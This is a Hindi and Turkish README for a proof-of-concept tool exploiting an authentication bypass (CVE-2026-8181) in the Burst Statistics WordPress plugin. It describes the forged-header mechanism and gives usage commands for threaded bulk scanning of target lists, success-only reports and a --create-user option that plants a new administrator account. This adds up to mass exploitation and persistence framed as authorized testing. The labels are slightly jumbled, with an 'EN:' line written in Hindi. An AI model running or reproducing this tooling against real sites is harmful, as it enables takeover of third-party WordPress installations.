
CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) प्रमाणीकरण बायपास। पायथन टूल — एकल और बहु-लक्ष्य स्कैन, थ्रेडेड वर्कर्स, TXT रिपोर्ट। केवल अधिकृत परीक्षण। अनुरक्षक: mürrez।
EN: नियंत्रित PoC और Burst Statistics में प्रमाणीकरण बायपास के अधिकृत सुरक्षा परीक्षण के लिए संक्षिप्त तकनीकी नोट्स।
TR: Burst Statistics eklentisindeki kimlik doğrulama atlatası için yetkili güvenlik testi amaçlı kontrollü PoC ve kısa teknik özet.
नोट: WordPress.org पर 200,000+ सक्रिय इंस्टॉल का आंकड़ा प्लगइन का संपूर्ण उपयोगकर्ता आधार है — इसका मतलब नहीं है कि हर साइट कमजोर संस्करण चलाती है। वास्तविक प्रभाव के लिए संस्करण + वातावरण (HTTP / एप्लिकेशन-पासवर्ड उपलब्धता, आदि) की जाँच आवश्यक है।
Not: WordPress.org’daki 200.000+ aktif kurulum sayısı eklentinin tüm kullanıcı tabanıdır; sitelerin tamamının zafiyetli sürümde olduğu anlamına gelmez. Gerçek etki için sürüm + ortam (HTTP, uygulama parolası uygunluğu vb.) doğrulanmalıdır.
GitHub-फ्लेवर्ड Markdown बिना किसी फ़ाइल को रिपॉजिटरी में रखे बाइनरी GIF एम्बेड नहीं करता। ऊपर दिए गए Typing SVG स्निपेट (CDN) गति का अनुकरण करते हैं। अपना खुद का स्क्रीन कैप्चर जोड़ने के लिए:

GitHub Markdown, repoda dosya olmadan GIF gömmeyi desteklemez. Üstteki Typing SVG (CDN) yazı animasyonu verir. Kendi demosun için:

flowchart LR
A[Client request] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Mis-handled branch| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: full admin context]
flowchart LR
A[İstek] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|Yanlış dal| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: tam admin bağlamı]
-f के साथ, -o और --output-dir परस्पर अनन्य हैं।
-f modunda -o ile --output-dir aynı anda kullanılamaz.
pip3 install requests urllib3
# Single site, report file
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k
# Single site + new admin (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k
# Bulk + combined file (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k
# Bulk + per-host files in folder (successes only)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k
# Tek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k
# Çoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k
# Çoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
Password: फ़ील्ड / Boş parola satırıसफल बायपास पीड़ित उपयोगकर्ता का वास्तविक पासवर्ड लीक नहीं करता — PoC में Basic पासवर्ड नकली होता है। Password: पंक्ति खाली रहती है जब तक --create-user एक नया खाता नहीं बनाता (तब उत्पन्न पासवर्ड लिखा जाता है)।
Başarılı bypass mevcut kullanıcının gerçek parolasını sızdırmaz — PoC’taki Basic parola sahtedir. Password: satırı --create-user ile yeni hesap oluşturulmadıkça boş kalır; oluşturulduysa üretilen şifre yazılır.
केवल लिखित-अधिकृत मूल्यांकन और आपकी अपनी लैब के लिए। कई क्षेत्राधिकारों में अनधिकृत उपयोग अवैध है। लेखक और इस README के अनुरक्षक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।
Yazılı izinli değerlendirmeler ve kendi laboratuvarınız içindir. İzinsiz kullanım birçok ülkede yasadışıdır. Yazarlar ve bu README’nin düzenleyicisi kötüye kullanımdan sorumlu değildir.
| फ़ील्ड | विवरण |
|---|
| क्या | प्रमाणीकरण बायपास (CWE-287) Burst Statistics में: गढ़े गए हेडर REST अनुरोधों को पूर्ण व्यवस्थापक संदर्भ तक बढ़ा सकते हैं। |
| संस्करण | कमजोर: 3.4.0, 3.4.1, 3.4.1.1 · उपयोग करें: 3.4.2 या नया |
| गंभीरता | CVSS ~9.8 (क्रिटिकल); लागू स्थितियों में रिमोट, बिना प्रमाणीकरण के। |
| यह रिपॉजिटरी | CVE-2026-8181.py — लैब स्वचालन: एकल लक्ष्य, बल्क सूची, थ्रेड पूल, चयनात्मक TXT आउटपुट। |
| Alan | Detay |
|---|
| Ne | Burst Statistics için kimlik doğrulama atlatası (CWE-287). Özel başlıklar ile REST isteğinde tam yönetici bağlamı. |
| Sürüm | Etkilenir: 3.4.0, 3.4.1, 3.4.1.1 · Önerilir: 3.4.2 ve üzeri |
| Ciddiyet | CVSS ~9.8 (Critical); uygun koşullarda uzaktan ve kimlik gerektirmeden. |
| Bu depo | CVE-2026-8181.py — lab otomasyonu: tek hedef, liste taraması, iş parçacığı havuzu, seçici TXT çıktısı. |
| फ़ीचर | विवरण |
|---|
| एकल लक्ष्य | -u बेस URL |
| बल्क लक्ष्य | -f targets.txt (प्रति पंक्ति एक URL; # टिप्पणियाँ) |
| समवर्तीता | -j N कार्यकर्ता (सीमित) |
| संयुक्त फ़ाइल | -o file.txt — -f के साथ, केवल सफल एक्सप्लॉइट जोड़े जाते हैं |
| प्रति-होस्ट फ़ाइलें | --output-dir — केवल सफल होस्ट्स को host.txt मिलता है (विफलताएँ छोड़ दी जाती हैं) |
| नया व्यवस्थापक | --create-user — REST के माध्यम से यादृच्छिक उपयोगकर्ता (पासवर्ड फिर रिपोर्ट में दिखाई देता है) |
| TLS (लैब) | -k प्रमाणपत्र सत्यापन अक्षम करता है (केवल विश्वसनीय लैब्स) |
| Özellik | Açıklama |
|---|
| Tek hedef | -u kök adres |
| Çoklu hedef | -f targets.txt (satır başına URL; # yorumu) |
| Paralellik | -j N işçi (üst sınırlı) |
| Tek dosya | -o dosya.txt — -f ile yalnızca başarılı exploit eklenir |
| Klasör çıktısı | --output-dir — sadece başarılılar host.txt alır |
| Yeni admin | --create-user — REST ile rastgele kullanıcı (şifre raporda) |
| TLS (lab) | -k sertifika doğrulamasını kapatır (yalnızca güvenilir lab) |